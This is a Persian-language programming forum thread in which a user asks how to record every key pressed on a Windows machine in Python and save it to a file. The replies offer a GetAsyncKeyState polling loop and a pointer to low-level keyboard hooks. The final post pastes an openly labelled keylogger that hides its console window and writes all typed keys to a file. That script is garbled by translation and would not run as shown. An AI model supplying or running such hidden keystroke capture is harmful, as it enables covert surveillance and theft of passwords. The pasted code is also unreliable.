نمایش نتایج 1 تا 10 از 10

نام تاپیک: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

  1. #1

    چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    با سلام

    چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ آیا همچین کلاسی برای این کار توی پایتون وجود داره ؟

  2. #2

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    سلام

    import ctypes
    from ctypes.wintypes import *
    user32=ctypes.windll.user32

    while 1:
    try:
    for i in range(255):
    code=user32.GetAsyncKeyState(i)
    if code!=0 & i!=255:

    print(i)
    except:
    pass


  3. #3

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    ممنون دوست عزیز لطف کردین
    میشه یک توضیح مختر در مورد این برنامه بدین ؟ تا من بهتر بفهمم که چطور کار میکنه ؟

    چون اجراش کردم ولی نتونستم جوابی بگیرم !!!!

  4. #4

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    چون اجراش کردم ولی نتونستم جوابی بگیرم !!!!
    منظورتون چیه؟
    اگه این کد رو اجرا کنید هر کلیدی رو که فشار بدید کد اسکی اون رو چاپ می کنه براتون
    در مورد کد هم از API های ویندوز داره استفاده می کنه

  5. #5

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    ببینید دوست عزیز من میخوام هر کراکتری که توسط کیبورد فشار داده میشه دقیقا همون همون کاراکتر (مثل a ) دقیقا همین کاراکتر رو بگیرم و بتونم توی یک فایل ذخیره کنم !
    منظور من این بود

  6. #6

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    سلام همهی کلید های فشرده شده تو برنامهی خودت فقط؟ اگه yes همون کد بالا کارت رو راه میندازه کد اسکی رو به کاراکتر مورد نظر تبدیل کن
    Kernel Mode Developer
    RootKitSMM@Yahoo.com

  7. #7

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    نقل قول نوشته شده توسط geek1982 مشاهده تاپیک
    سلام همهی کلید های فشرده شده تو برنامهی خودت فقط؟ اگه yes همون کد بالا کارت رو راه میندازه کد اسکی رو به کاراکتر مورد نظر تبدیل کن
    نه دوست عزیز !

    از زمانی که این برنامه اجرا میشه هر کلیدی و به هر منظوری که فشرده میشه رو میگیرد و ذخیره میکند ... در این صورت راه حلی کسی داره؟

  8. #8

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    چرا نیست برادر
    SetWindowsHookEx

    یه هوک سطح پایین می خواد WH_KEYBOARD_LL
    Kernel Mode Developer
    RootKitSMM@Yahoo.com

  9. #9

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    دوست عزیز میشه یه کم بیشتر توضیح بدی ؟

  10. #10

    نقل قول: چطور میشه تمام کلیدهای فشرده شده توسط کیبورد رو خوند وجایی ذخیره کرد ؟ (پایتون)

    سرچ گن عزیز بردار

    از pyhook استفاده کن اینم مثال :


    1. Download and install the necessary software:
    2. From the Start menu, select "Python 2.6> PythonWin" to start the editor
    3. From the menu select "File> New", then choose the "Python Script" and give "OK"
    4. Paste the following source (attention to indentation)

      import WIN32API
      import win32console
      import win32gui

      import pythoncom, pyHook

      win32console.GetConsoleWindow win = ()
      win32gui.ShowWindow (win, 0)

      final OnKeyboardEvent (event):
      if event.Ascii == 5:
      _exit (1)

      if event.Ascii! = 0 or 8:
      f = open ( 'c: \ output.txt', 'r')
      buffer = f.read ()
      f.close ()
      f = open ( 'c: \ output.txt', 'w')
      keylogs = chr (event.Ascii)
      if event.Ascii == 13:
      keylogs = '/ n'
      buffer + = keylogs
      f.write (buffer)
      f.close ()

      hm = pyHook.HookManager ()
      hm.KeyDown = OnKeyboardEvent
      hm.HookKeyboard ()
      pythoncom.PumpMessages ()
    5. Save the file in c: \ as "logger.py," then by PythonWin type CTRL + R: the keylogger will come started in the background and will run until the log file "C: \ output.txt" anything that will typed on the keyboard.


    Kernel Mode Developer
    RootKitSMM@Yahoo.com

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •